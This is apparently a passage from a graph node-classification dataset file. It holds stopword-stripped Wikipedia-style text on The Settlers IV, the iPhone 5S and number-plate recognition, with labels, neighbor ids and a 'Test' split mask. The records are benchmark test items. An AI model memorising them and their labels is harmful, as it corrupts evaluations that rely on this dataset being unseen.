serfs titular settlers transport materials tools produce populate perform requisite task building settlers iii new settlers acquired construction residences point player directly control normal settler instead general orders issued ordering construction building ai handling delegation orders specific settlers however player control specialist settlers four types pioneers extend player territory digging border thieves scout enemy territory steal resources geologists test mountainous ground raw materials gardeners reclaim terrain corrupted dark tribe playing multiplayer game player also access fifth specialist unit saboteur attack destroy enemy buildings military installations settlers iii players construct road network instead settlers walk freely around player territory ai handling pathfinding like previous games series settlers iv adjustable goods priority system determines order items transported players also build marketplaces allow establishment trade routes areas geographical region shipyards allow manufacture warships ferries transport specialist settlers soldiers war machines trade ships transport items landing dock different geographical region original game player controlled three races romans vikings mayans trojans elixir power added trojans fourth race settlers iii race slightly different economic model example romans trojans construction industries require roughly equal amounts wood stone vikings wood stone mayans stone wood race also specific skills example romans produce manna using two buildings vikings build war machines warships use manna rather physical ammunition mayans utilise desert terrain grow agave plants necessary production tequila economy player control throughout game adjustable multiple ways example player control distribution goods selecting percentage given resource transported given building similar manner player select tools made tool production important insofar buildings require raw materials worker right tool example player built mine building still empty despite presence idle settlers pickaxe need manufactured toolsmith game also uses notification system alerts player building occupied either due lack right tool absence available settlers settlers iii game features magic whereby race call upon deities economic and/or military assistance player manna priests finite access number spells nature depends race spells include limited tuning fish stone turning enemy soldiers allies romans turning stone iron temporarily freezing enemies vikings turning wood gold turning enemy bowmen butterflies mayans turning sulphur iron turning enemy soldiers normal settlers trojans player territory expanded using pioneers building military complex near territory border complex must least one soldier garrisoned territory expand recruit soldiers player must build barracks individual soldier requiring requisite weapon transition settler soldier player also build lookout towers manned regular settlers see great distances n't grant new territory three classes soldier common races swordsmen bowmen squad leaders level swordsmen bowmen set player prior recruitment types soldier three ranks determined amount gold necessary recruitment gold level 1 one gold bar level 2 two gold bars level 3 squad leaders available one rank require sword suit armour three gold bars recruit well stronger health level 3 swordsman also affect troops around improving formations increasing combat strategy enhancing abilities additionally player assigns squad leader group soldiers orders need issued squad leader squad automatically follow destination ordered player race also produce warships war machines catapults romans magical lightning generators vikings canons mayans ballistae trojans special military units medics romans axe warriors vikings blowgun warriors mayans backpack catapultists trojans swordmen bowmen special military units three levels recruitment order player attack enemy building must click near building soldiers selected player units defeat soldiers stationed building occupy player territory increasing according building radius defense player military buildings automatic enemies attack soldiers stationed building defend nearby soldiers also defend building unless ordered soldiers fighting within territory strength always 100 fighting outside strength tied economic value settlement especial importance improving strength one army eyecatchers decorative monuments worth double construction value relation player military strength game begins shortly failure rebellion instigated dark god morbus great god treachery banishes morbus earth morbus hated place universe due vast amounts greenery unable bear touching foliage morbus determines destroy earth plant life dark gardener eventually develops substance known shadow-weed sucks energy land killing nearby foliage transforming terrain blackened wasteland dark lands meanwhile unaware presence morbus war raging three races recently come contact one another romans vikings mayans first encounter dark lands romans whose scouts return word effects shadow-weed initially believe new mayan weapon result romans attack destroy nearby mayan colony quickly realise dark lands mayans mayans also encountered dark lands suggest temporary alliance romans reluctantly agree however begin investigate dark lands mayans turn elsewhere vikings also encounter effects shadow-weed discover one sacred burial grounds surrounded dark lands setting reclaim territory attacked army mindless soldiers nearby romans learn secret dark army created human settlers converted shamans servants morbus thus forming dark tribe put work mushroom farms converting mushroom spores manna transported nearest dark temple used create dark army clearer understanding dark tribe romans ally vikings determine destroy farms however mayans see alliance romans vikings direct threat attacking colonies belonging realise alliance focused attacking combating dark tribe time however find surrounded dark lands despite previous animosity romans vikings save mayans three unite going offensive effort wipe dark tribe eventually vikings locate believe final dark temple destroy remnants dark tribe survive rally final battle secure knowledge one victory required mayans launch attack prove victorious dark tribe temples farms eradicated way breeding new troops morbus retreats lair begging mercy morbus horrified see vines infesting building quickly wrapping around turning stone trojans elixir power begins many centuries events main game morbus remains petrified state territory controlled trojans unaware races morbus identity war dark tribe story begins morbus assistant q'nqüra spreads shadow-weed around statue releasing trojans discover statue gone effects shadow-weed spreading elect abandon area landing new island encounter friendly romans hostile mayans allying romans trojans tell disappearance morbus statue romans tell history war call meeting four races shocked however learn dark tribe using aerial vehicles dubbed manacopters easily infiltrate lines inflict huge losses romans vikings mayans attacked trojans tasked destroying dark tribe research lab manacopter blueprints raid lab however discover morbus plan dark gardeners attempting create elixir cure inability touch greenery using complex combination herbs one herb final breakthrough four races divide land sectors search final herb shortly thereafter vikings locate priests begin harvest dark tribe soon arrive trojans develop poison use herb vikings unable harvest time viking priest ambushed killed dark tribe acquire herb however remains unclear priest able use poison death meanwhile morbus temple located trojans lead assault succeed destroying morbus able create drink elixir emerging ruins temple see greenery surrounding laughs declares nothing stop game cuts time later site temple stands small cottage garden full blooming flowers morbus emerges cottage happily attends garden fully cured hatred foliage settlers iv announced blue byte ects august 1999 however volker wertich created settlers series designed programmed original settlers settlers iii would involved development later explained blue byte wanted ready release christmas 2000 opinion sufficient time create worthy title game first shown e3 event may 2000 blue byte stated gameplay would emphasise economic planning military conquest citing negative feedback fans felt settlers iii combat-orientated designers intended new game return core supply demand-based gameplay settlers settlers ii also revealed game would feature three playable races romans vikings mayans new non-playable race dark tribe speaking importance dark tribe economic-based gameplay project manager co-designer hans-jürgen brändle explained interview gameszone brändle stated made sure balance settling combat virtually every rule change new feature addressing game would feature nearly identical economic processes settlers iii despite refocused gameplay explained majority feedback gave us clear understanding economy settlers simply great game artificially inflated new goods people fun ease playing overwhelmed unnecessarily complex contexts speaking ign later year brändle reiterated designers hopes game would fully integrate economic-based settling combat previous title three races game brändle explained developers chose romans traditional settlers race vikings fan-requested race mayans needed race used stone wood construction industry developers felt mayans somewhat historically mysterious culture gameszone interview brändle also addressed issue similarity graphics new game settlers iii explaining deliberately programmed engine much like previous one wanted make fans feel like back familiar world settlers settlers iii buildings game created using 3d studio max adobe photoshop used create textures race assigned specific artist worked nothing except buildings particular race according lead artist/co-designer/co-writer torsten hess done style buildings within people uniform however certain overriding rules individual artists adhere one important technique hess employed settlers iii textures applied dirtied create lived-in real-world sense hess explains rigid straight edges avoided beautiful curves moving lines instead used suggest life settlers world textures means stronger colours slightly higher contrast figures well lot detail use many different colour families definitely want avoid sterile look also draw textures hand settlers designers also used basic techniques developed settlers iii figures could n't graphically complex since small details would lost given size 32 pixels height however time designs detailed enough seem least somewhat realistic even small size solve problem settlers proportions exaggerated weapons tools designed proportionally big correctly sized implements would far small seen process animating settlers character animator/co-writer thorsten wallner explains place skeleton behind settler controls movement sequences skeleton dictates standard movements bending running standing additional animations added individual characters technology need animate every settler anew add additional animations july 2000 blue byte advertised 5,000 participants online closed beta however beta postponed early august due technical issues related lobby software causing disruption battle isle andosia war late august blue byte revealed would least mid-september beta began october blue byte released smack thief minigame designed promote main game variation whac-a-mole smack thief player must click viking thieves raid roman stores escape available free download blue byte website game allowed players upload high scores global high score table early november online beta cancelled blue byte stating decided take step concentrate completing game conducting large public beta test requires lot additional resources want invest specifically development quality assurance instead ensured internal testing department interview planet games brändle explained resources filter sort anticipated feedback beta test currently concentrating exclusively completion product following week blue byte announced slated december release pushed back january 2001 thomas hertzler blue byte ceo series producer explaining know many gamers particularly looking forward settlers iv year course understand settlers fans disappointed end however made decision players mind settlers iv shelves christmas fans receive game corresponds blue byte high quality standard january german release date pushed back february 15 february 6 ubi soft announced acquisition blue byte revealing plans publish game internationally president ceo yves guillemot stating february 15 game released germany planned however suffered numerous bugs leading negative reaction fans criticism game blue byte german gaming press although blue byte issued patch day game released introduced additional problems leading negative press second patch released four days later correct problems introduced first patch according german magazine pc games 76 players experienced technical difficulties release version game co-designer thorsten mutschall later admitted ready release february held back additional playtesting programming march 19 ubi soft announced game would released throughout europe end month explaining reasons behind unfortunate delay product essentially quality assurance issues november 2009 working conjunction blue byte license ubisoft gameloft ported game ios released title settlers april 2010 game ported webos specifically optimised use palm pre september gameloft released hd versions ipad bada optimised wave s8500 settlers hd later released symbian january 2011 android may although handheld versions game feature updated graphics gameplay game mechanics identical original storyline including full twenty-one single-player missions original release three roman missions three viking missions three mayan missions twelve mission dark tribe campaign main change game involves hud redesigned accommodate touchscreen controls example rather building menu always present onscreen accessed pressing icon opens build menu within menu player access various submenus basic buildings food buildings military buildings similarly access menu control specialist settlers player touches another icon available player settlers available pressing icon two seconds brings brief help screen icon pausing game allows player access full help menu replacing extended tool tips appeared on-screen original settlers iv received mixed average reviews aggregate score 74 100 metacritic based five reviews 71 gamerankings based seventeen reviews ios version received positively aggregate score 79 gamerankings based six reviews pc player damian knaus scored original game 85 100 giving gold player award although impressed dark tribe criticised integration gardeners gameplay calling unnecessary extravagance also critical lack real innovations absence female settlers however despite reservations felt game best settlers title thus far especially impressed graphics pc games rüdiger steidle scored 77 lowest score magazine ever given settlers title issue review appeared editorial justifying score text box within review titled 77 magazine stated review steidle criticised game similarity settlers iii writing blue byte altered concept although praised graphics tutorials variety mission objectives critical bugs writing typical blue byte fashion game appeared time first patch concluded anyone like fan series disappointed pc gamer jim preston scored 72 although praised economic system game built criticised lack variety within writing 're forced create entire supporting infrastructure settlement way every time also referred gameplay complication masquerading depth ign dan adams scored 7 10 comparing unfavourably biggest criticism concerned lack differentiation settlers iii writing aside improved graphics small additions hard tell really new game also critical ai pathfinding repetitive missions felt designers failed steer gameplay away over-reliance combat although praised graphics animations game great personality concluded blue byte n't managed find new ideas might keep series becoming serious pool stagnant gaming quickly becoming gamespy bernard dy scored 67 100 comparing unfavourably age empires ii like adams felt similar settlers iii although praised appealing graphics fascinating animations felt blue byte failed return gameplay economic focus writing nearly every scenario race build military also criticised ai lack combat strategy mission variety however praise free settle multiplayer modes concluded settlers fourth edition charming moments long surpassed games better character superior combat gamespot ron dulin scored 6.4 10 finding similar problems adams dy comparing unfavourably impressions games city building series finding similar settlers iii felt blue byte failed move away reliance combat also criticised mission variety lack combat strategy writing never complex moving units slowly enemy territory hoping 'll left opponent n't although praised basic supply demand-based gameplay graphics concluded settlers fourth edition really old game old problems computer gaming world mark asher scored 3 5 criticising scenarios differ minor ways arguing best part game free settler mode although praised graphics called game pleasant enough experience noted offered major differences previous settlers titles would interest existing fanbase opined may getting bored formula game commercial success 2001 highest selling german-developed game february 2002 awarded platinum award verband der unterhaltungssoftware deutschland e.v vud award given titles costing dm55 sell 200,000 units nationally within first twelve months release august 2002 game sold 300,000 units germany appspy andrew nesvadba scored ios version 5 5 praising graphics touchscreen controls writing settlers everything great strategy games easy enough jump muck around progressing ultimately complex amazingly detailed set interactions players learn arron hirst 148apps scored 4 5 although critical lack free play multiplayer modes praised controls replication original game mechanics concluding game immersive addicting toucharcade also scored 4 5 criticising lack free play praising graphics sound effects calling game solid experience pocket gamer tracy erickson scored 8 10 giving silver award calling surprisingly good largely positive although critical lack free play multiplayer modes felt playing area oftentimes cluttered icons menus concluded praising deep economic strategy gameplay pocket gamer wayne turton scored bada version settlers hd 7 10 giving bronze award praising tutorials controls graphics however critical absence non-campaign missions multiplayer mode combat system writing victory usually comes side field units concluded magical quality settlers hd draws depth keep playing symbian ewan spence scored symbian version 76 although critical ai feeling screen becomes cluttered especially combat concluded hits required marks game like pocket gamer brendan caldwell scored android version 8 10 giving silver award calling almost resounding victory although critical tutorials felt n't adequately explain intricacies game controls argued n't quite accuracy speed truly emulate traditional mouse keyboard setup concluded depth often enjoyed android titles settlers hd enthralling game game first expansion settlers iv mission cd released germany august 2001 featuring three five-mission single-player campaigns three settlement missions focusing building player settlement achieving economic goals opposed military conquest three conflict missions focusing combat sixteen new maps single-player mode eighteen new maps multiplayer mode terms gameplay mission cd features improved ai varied mission objectives sophisticated scripting within missions higher difficulty single-player games expansion also features random map generator map editor numerous bug fixes stabilisations blue byte released second expansion settlers iv trojans elixir power december featuring thirteen new maps single-player mode thirteen new maps multiplayer mode three new four-mission single-player campaigns original three races four settlement missions new twelve-mission campaign player controls new race trojans expansion also features improved graphics adjustable difficulty random map generator map editor included mission cd terms gameplay importance eyecatchers modified whereas original game player could increase offensive strength beyond 100 building enough eyectachers building large numbers single eyectacher trojans elixir power maximum offensive strength achievable 100 reached player builds least one every eyecatcher released march 2002 settlers iv gold edition contains original game mission cd trojans elixir power also features fan-made maps multiplayer mode smack thief minigame new minigame dark side microsoft windows wallpapers settlers -themed skins winamp icq 2013 gold edition released gog.com blue byte later released two german-language expansions november 2002 released die siedler iv die neue welt set shortly vikings discover america game begins mayans organising feast vikings travelling europe aim taking possession wonders world beginning colossus rhodes vikings meanwhile discover map amongst mayans possessions leading mythological island inhabited women promptly set find trojans expelled troy romans searching new homeland head west time romans attempting reconquer world beginning newly discovered continent expansion features four five-mission single-player campaigns one three original races one trojans multiple objectives many optional economic-based rather military-based also two new single-player maps three new multiplayer maps enhanced graphics textures november 2003 released die siedler iv community pack expansion features four fan-created single-player campaigns based real historical conflicts roman attack carthage third punic war viking invasion england huaxtec resistance spanish conquistadors battle troad wars diadochi november 2018 ubisoft re-released game standalone history edition part settlers history collection optimised windows 10 re-release contains original game mission cd trojans elixir power die neue welt community pack expansions features autosave 4k monitor support dual monitor support adjustable resolutions texture quality vsync online multiplayer available uplay history collection also includes re-releases settlers settlers ii settlers iii",
    "neighbors": [
      10080,
      6539,
      2285,
      6797,
      9780,
      6266
    ],
    "mask": "Test"
  },
  {
    "node_id": 6884,
    "label": 2,
    "text": "IPhone_5S:iphone 5s iphone 5s stylized marketed iphone 5s smartphone designed marketed apple inc seventh generation iphone succeeding iphone 5 device unveiled september 10 2013 apple cupertino headquarters released september 20 2013 along lower-cost counterpart iphone 5c iphone 5s maintains almost external design predecessor iphone 5 although 5s received new white/gold color scheme addition white/silver space gray/black 5s vastly upgraded internal hardware however introduced a7 64-bit dual-core system-on-chip first 64-bit processor used smartphone accompanied m7 motion co-processor redesigned home button touch id fingerprint recognition system used unlock phone authenticate app store itunes store purchases also introduced camera also updated larger aperture dual-led flash optimized different color temperatures iphone 5s originally shipped ios 7 introduced revamped visual appearance among new features designed jony ive ios 7 departed skeuomorphic elements used previous versions ios favor flat colorful design among new software features introduced iphone 5s airdrop ad-hoc wi-fi sharing platform control center control panel containing number commonly used functions itunes radio internet radio service earphones known earpods included 5s apple released accessories including case dock reception towards device generally positive outlets considering best smartphone available market due upgraded hardware touch id changes introduced ios 7 criticized iphone 5s keeping design small display iphone 5 others expressed security concerns touch id system nine million units iphone 5s iphone 5c sold weekend release breaking apple sales record iphones iphone 5s best selling phone major u.s. carriers september 2013 iphone 5s succeeded apple flagship smartphone larger iphone 6 september 2014 march 21 2016 5s received direct replacement announcement iphone se incorporated internal hardware similar iphone 6s retaining smaller form factor design 5s iphone 5s iphone supported six major versions ios second ios device support six major updates first ipad 2 supported ios 4 9 official unveiling media speculation primarily centered reports next iphone would include fingerprint scanner including apple july 2012 acquisition authentec developer mobile security products references fingerprint sensor home button beta release ios 7 leaked packaging iphone 5s showing traditional home button metallic ring around similar ring-based imagery seen official invitation apple iphone press event september 2013 new device unveiled shortly official unveiling wall street journal also reported rumor apple announced iphone 5c iphone 5s media event cupertino headquarters september 10 2013 iphone 5c became available preorder september 13 2013 iphone 5s available preorder devices released september 20 2013 promotion focused touch id 64-bit apple a7 processor also highlight event schiller showed demos infinity blade iii demonstrate a7 processing power device camera using untouched photographs release ios 7 september 18 2013 also announced keynote iphone 5s released september 20 2013 united states united kingdom canada china france germany australia japan hong kong singapore released 25 additional countries october 25 2013 12 countries november 1 2013 indonesia last country receive iphone 5s january 26 2014 september 19 2014 iphone 5s succeeded apple flagship smartphone iphone 6 iphone 6 plus older model remained available purchase reduced price 64gb version discontinued gold edition iphone 5s discontinued september 9 2015 apple revealed iphone 6s iphone 6s plus iphone 5s discontinued march 21 2016 succeeded iphone se continues form factor features vastly upgraded internals similar flagship iphone 6s break apple product positioning trend north america western europe starting iphone 4s released october 2011 gave newly released model one year flagship phone moving midrange second year production third final year entry-level offering discontinuation iphone 5s expected continue sale september 2016 replacing a7 processor early meant apple reduced long-term chip support window year ios addition new iphone launch meant stimulate demand sales iphone 6s 6s plus met expectations since september 2015 release iphone family expected suffer first ever negative growth quarter 2016 iphone 5s maintains similar design iphone 5 lcd multi-touch retina display screen resolution 640×1136 326 ppi home button updated new flat design using laser-cut sapphire cover surrounded metallic ring button longer concave contain familiar squircle icon seen previous models phone thick weighs phone uses aluminum composite frame device available three color finishes space gray replacing black slate trim iphone 5 white silver trim white gold trim iphone 5s first iphone available gold color decision influenced fact gold seen popular sign luxury product among chinese customers iphone 5s powered apple a7 system-on-chip first 64-bit processor ever used smartphone device operating system pre-loaded software optimized run 64-bit mode promising increased performance although third-party app developers would need optimize apps take advantage enhanced capabilities a7 processor designed apple manufactured samsung a7 processor accompanied m7 motion co-processor dedicated processor processing motion data iphone accelerometer gyroscopes without requiring attention main processor integrates ios 7 new coremotion apis a7 soc m7 motion co-processor also found ipad air ipad mini 2 released quarter iphone 5s phone includes 1560 mah battery provides 10 hours talk time 250 hours standby time camera still 8 megapixels resolution image capture size 3264 × 2448 4:3 lens larger aperture 2.2 larger sized pixels image sensor previous iphone models flashlight dual true tone flashes consisting amber led white led variably used based color temperature photo improve color balancing camera also includes automatic image stabilization dynamic tone mapping 10 fps burst mode best shot mode slow motion video 120 fps home button iphone 5s incorporates fingerprint recognition system known touch id based technology authentec company apple acquired 2012 sensor uses capacitive cmos-based sensor detect sub-epidermal layers fingers 500 pixels per inch uses 360-degree design read print angle sensor activated touch-sensitive metallic ring surrounding button touch id used various authentication activities within operating system unlocking device authenticating app store itunes purchases instead apple id password sensor trained recognize fingerprints multiple fingers multiple users fingerprint data stored encrypted format within secure enclave a7 chip accessible apps servers including icloud iphone 5s camera paired double led flash allowing higher quality nighttime photos included ios 7 new camera app allowing iphone 5s capture fast continuous shots record slow-motion videos earphones known apple earpods included iphone 5s according technology commentators design earphones aimed improve sound quality allowing air travel freely apple states design earphones allows rival high-end headphones cost hundreds dollars reviews gizmodo techradar reported although earphones sounded better predecessor reviewers felt quality sound produced poor techradar opined earpods inferior earphones similar price iphone 5s initially supplied ios 7 released september 20 2013 jonathan ive designer ios 7 new elements described update bringing order complexity highlighting features refined typography new icons translucency layering physics gyroscope-driven parallaxing major changes design design ios 7 os x yosemite version 10.10 noticeably departs skeuomorphic elements green felt game center wood newsstand leather calendar favor flat colorful design ios 7 adds airdrop ad-hoc wi-fi sharing platform users share files iphone 5 onwards ipod touch 5th generation ipad 4th generation onwards ipad mini 1st generation onwards operating system also adds control center control panel accessed swiping bottom screen control center contains number commonly used functions volume brightness controls along toggles enabling wi-fi bluetooth airplane mode using rear camera flash led flashlight itunes radio internet radio service also included iphone 5s free ad-supported service available itunes users featuring siri integration ios users able skip tracks customize stations purchase station songs itunes store users could also search history previous songs apple announced june 2018 iphone 5s support ios 12 update made iphone 5s longest supported ios device supported six major versions ios operating system par ipad 2 supported ios 4 ios 9 iphone 5s also receive major speed boosts 70 according apple includes camera keyboard functions supported 6 versions ios ios 7 ios 12 iphone revealed iphone 5s receiving ios 13 update debuted june 3 2019 wwdc come later 2019 autumn keynote apple announced case iphone 5s made soft microfiber inside leather outside case announced along iphone 5c case first cases apple announced since iphone 4 bumpers docks iphone 5s 5c found apple online store announcement casing difference iphone 5s 5c separate docks made specifically respective phone iphone 5s received mostly positive reception reviewers commentators walt mossberg things digital gave phone favorable review saying touch id sounds like gimmick ’ real advance biggest step ever biometric authentication everyday devices labeled best smartphone market david pogue new york times praised touch id said innovation smartphone market saturated maybe age annual mega-leaps focused much review ios 7 believed biggest change device previous generations praising new siri features control center airdrop editorial pogue stated ios 7 biggest change iphone series citing utilitarian interface changes main contributor scott stein cnet criticized lack design change iphone 5 said although iphone 5s required upgrade easily fastest advanced apple smartphone date although praised camera 64-bit a7 chip m7 motion-chip fingerprint scanning capabilities investors thought iphone 5s although notable improvement iphone 5 still relatively unchanged predecessor worried iphone line become stagnant dull product apple share price fell 5.4 launch close month low 467.71 nasdaq darrell etherington techcrunch praised iphone 5s best smartphone available said looks may different iphone 5 internal components dramatic impact day-to-day activities normal smartphone user went detail explaining impact improved camera specifications phone etherington suggested 64-bit a7 processor reach full potential developers create applications supporting myriam joire engadget found iphone 5s could benefit significantly a7 developers created applications optimized 64-bit processor anand lal shimpi anandtech praised phone a7 processor describing seriously impressive stated futureproof iphone ever launched much pains use word futureproof one people likes hold onto device iphone 5s good starting point scott lowe ign also spoke highly 64-bit processor substantial lead processing power htc one samsung galaxy s4 accounting graphics boost 32 38 cpu benchmarks debut apple 64-bit a7 processor took rival android smartphone makers surprise particularly qualcomm whose 64-bit system-on-chip released 2015 reviewers recommended iphone 5s iphone 5c released time 5c retained almost hardware discontinued iphone 5 iphone 5s featured substantially improved performance/features thanks new 64-bit a7 processor well extra storage space relatively small additional upfront cost iphone 5c us 650 versus us 550 march 2014 especially case ios 8 released iphone 5s iphone 5c moved mid low end iphone range respectively iphone 5s still 16 32 gb storage available iphone 5c make 8 gb storage 4.9gb available user installing ios 8 furthermore 5c polycarbonate exterior received mixed reception seen cost-cutting downgrade compared iphone 5 aluminum/glass case 5s retained latter design looked even premium due additional gold finish 2015–16 still significant number customers preferred 4-inch screen size iphone 5s remained second-most popular iphone iphone 6 ahead iphone 6s apple stated event sold 30 million 4-inch iphones 2015 even form factor succeeded flagship iphone redesigned larger display 4.7/5.5-inch iphone 6 6 plus back september 2014 furthermore 5/5s design regarded long golden child apple phone design benchmark phones general 5s gold finish adding premium touch 5 already well-regarded look succeeding 6 6s design less critically acclaimed felt little bit wrong though holding slick 650 bar soap iphone 5 described elegance rooted way aluminum glass work together felt streamlined yet substantial different iphone 6 feels substantial size alone plus unlike ubiquitous rounded corners 6 iphone 5 ’ really look like anything else market time however iphone 5/5s design suited scaling contrast iphone 6/6s could better accommodate growing consumer trend towards larger screen sizes indeed spawned 6/6s plus phablet models apple discontinued iphone 5s replaced iphone se outwardly appears almost identical 5s even se internal hardware upgraded significantly iphone 5s 5c sold nine million units first three days setting record first weekend smartphone sales 5s selling three times units 5c first day release 1 iphones us iphone 5ss 0.3 iphone 5cs. ref name= cnet ip5s/c sales 1 /ref gene munster piper jaffray reported line fifth avenue apple store contained 1,417 people release day compared 1,300 iphone 4 2010 549 iphone 3g 2008 respective release days first time apple launched two models simultaneously first-day release china also contributed record sales result launch day major in-stock shortages reported stores across countries iphone 5s initially went sale great many customers line outside apple stores worldwide left disappointed due severe shortages across 5s models gold model particular highly limited supply situation eased us days following launch countries reported receiving restocks commentators questioned apple handled initial release online pre-orders offered iphone 5s meaning large numbers people queuing outside physical stores line receiving unit us apple offered online reservation system customers could keep checking units available local apple stores order pickup online orders also short supply launch day shipping date across model sizes colors changing 7-10 working days october countries within hours online orders taken iphone 5s best selling phone sprint verizon t-mobile september 2013 united states outselling iphone 5c samsung galaxy s4 according consumer intelligence research partners iphone 5s outsold 5c two-to-one margin september release confirming apple ceo tim cook view high-end smartphone market reaching point market saturation commentators viewed 5c flop supply chain cuts signifying decline demand 5s viewed massive success apple admitted failed anticipate sales ratio leading overstocking 5c shortages 5s six months release iphone 5s march 25 2014 apple announced sales iphone brand exceeded 500 million units may 2014 despite market eight months iphone 5s reportedly outsold newly released samsung galaxy s5 40 7 million iphone 5s units versus 5 million galaxy s5 units galaxy s5 failure oust iphone 5s top selling spot major setback samsung mobile preceding samsung galaxy siii samsung galaxy s4 first quarter releases outsold iphone 4s iphone 5 respectively number technology writers including adrian kingsley-hughes zdnet kevin roose new york believed fingerprint scanning functionality iphone 5s could help spur adoption technology alternative passwords mainstream users especially bring device scenarios fingerprint-based authentication systems enjoyed wider usage enterprise environments however citing research biometrics engineer geppy parziale roose suggested cmos-based sensor could become inaccurate wear time unless apple designed sensor prevent occurring brent kennedy researcher united states computer emergency readiness team recommended users immediately rely technology citing uncertainty whether system could properly reject spoofed fingerprint following release iphone 5s german chaos computer club announced september 21 2013 bypassed apple new touch id fingerprint sensor using easy everyday means group explained security system defeated photographing fingerprint glass surface using captured image make latex model thumb pressed sensor gain access spokesman group stated hope finally puts rest illusions people fingerprint biometrics plain stupid use something ca n't change leave everywhere every day security token however 2013 39 american smartphone users used security measures protect smartphone others also tried chaos computer club method concluded easy process either time effort given user use high resolution photocopy complete fingerprint special chemicals expensive equipment spoofing process takes time achieve several problems experienced iphone 5s hardware release widely reported issue angle reported phone level sensor drifted several degrees caused gyroscope compass accelerometer become inaccurate reports suggested hardware-induced problem encountered problems crashing blue screen restarting power button making rattling noise phone shaken overheating microphone working touch id working itunes purchases issues since fixed software updates",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      1083,
      8253,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      8806,
      3691,
      2673,
      6258,
      10357,
      4220,
      7292,
      2686,
      6783,
      10365,
      10878,
      4741,
      9863,
      8842,
      6283,
      9356,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      2259,
      3286,
      9430,
      3293,
      4318,
      9952,
      9451,
      1772,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      487,
      488,
      2023,
      5616,
      4081,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 6885,
    "label": 4,
    "text": "Automatic_number-plate_recognition:automatic number-plate recognition automatic number-plate recognition anpr see also names technology uses optical character recognition images read vehicle registration plates create vehicle location data use existing closed-circuit television road-rule enforcement cameras cameras specifically designed task anpr used police forces around world law enforcement purposes including check vehicle registered licensed also used electronic toll collection pay-per-use roads method cataloguing movements traffic example highways agencies automatic number-plate recognition used store images captured cameras well text license plate configurable store photograph driver systems commonly use infrared lighting allow camera take picture time day night anpr technology must take account plate variations place place concerns systems centered privacy issues government tracking citizens movements misidentification high error rates increased government spending critics described form mass surveillance anpr sometimes known various terms anpr invented 1976 police scientific development branch britain prototype systems working 1979 contracts awarded produce industrial systems first emi electronics computer recognition systems crs wokingham uk early trial systems deployed a1 road dartford tunnel first arrest detection stolen car made 1981 however anpr become widely used new developments cheaper easier use software pioneered 1990s collection anpr data future use i.e solving then-unidentified crimes documented early 2000s first documented case anpr used help solve murder occurred november 2005 bradford uk anpr played vital role locating subsequently convicting killers sharon beshenivsky software aspect system runs standard home computer hardware linked applications databases first uses series image manipulation techniques detect normalize enhance image number plate optical character recognition ocr extract alphanumerics license plate anpr systems generally deployed one two basic approaches one allows entire process performed lane location real-time transmits images many lanes remote computer location performs ocr process later point time done lane site information captured plate alphanumeric date-time lane identification information required completed approximately 250 milliseconds information easily transmitted remote computer processing necessary stored lane later retrieval arrangement typically large numbers pcs used server farm handle high workloads found london congestion charge project often systems requirement forward images remote server require larger bandwidth transmission media anpr uses optical character recognition ocr images taken cameras dutch vehicle registration plates switched different style 2002 one changes made font introducing small gaps letters p r make distinct therefore legible systems license plate arrangements use variations font sizes positioning—anpr systems must able cope differences order truly effective complicated systems cope international variants though many programs individually tailored country cameras used existing road-rule enforcement closed-circuit television cameras well mobile units usually attached vehicles systems use infrared cameras take clearer image plates 1990s significant advances technology took automatic number-plate recognition anpr systems limited expensive hard set fixed based applications simple point shoot mobile ones made possible creation software ran cheaper pc based non-specialist hardware also longer needed given pre-defined angles direction size speed plates would passing camera field view scaled-down components cost-effective price points led record number deployments law enforcement agencies around world smaller cameras ability read license plates higher speeds along smaller durable processors fit trunks police vehicles allowed law enforcement officers patrol daily benefit license plate reading real time interdict immediately despite effectiveness noteworthy challenges related mobile anprs one biggest processor cameras must work fast enough accommodate relative speeds 100 mph 160 km/h likely scenario case oncoming traffic equipment must also efficient since power source vehicle battery equipment must small minimize space requires relative speed one issue affects camera ability actually read license plate algorithms must able compensate variables affect anpr ability produce accurate read time day weather angles cameras license plates system illumination wavelengths also direct impact resolution accuracy read conditions installing anpr cameras law enforcement vehicles requires careful consideration juxtaposition cameras license plates read using right number cameras positioning accurately optimal results prove challenging given various missions environments hand highway patrol requires forward-looking cameras span multiple lanes able read license plates high speeds city patrol needs shorter range lower focal length cameras capturing plates parked cars parking lots perpendicularly parked cars often require specialized camera short focal length technically advanced systems flexible configured number cameras ranging one four easily repositioned needed states rear-only license plates additional challenge since forward-looking camera ineffective oncoming traffic case one camera may turned backwards seven primary algorithms software requires identifying license plate complexity subsections program determines accuracy system third phase normalization systems use edge detection techniques increase picture difference letters plate backing median filter may also used reduce visual noise image number possible difficulties software must able cope include problems corrected within software primarily left hardware side system work solutions difficulties increasing height camera may avoid problems objects vehicles obscuring plate introduces increases problems adjusting increased skew plate cars tow bars may obscure one two characters license plate bikes bike racks also obscure number plate though countries jurisdictions victoria australia bike plates supposed fitted small-scale systems allow errors license plate used giving specific vehicles access barricaded area decision may made acceptable error rate one character likelihood unauthorized car similar license plate seen quite small however level inaccuracy would acceptable applications anpr system front end anpr system imaging hardware captures image license plates initial image capture forms critically important part anpr system accordance garbage garbage principle computing often determine overall performance license plate capture typically performed specialized cameras designed specifically task although new software techniques implemented support ip-based surveillance camera increase utility anpr perimeter security applications factors pose difficulty license plate imaging cameras include speed vehicles 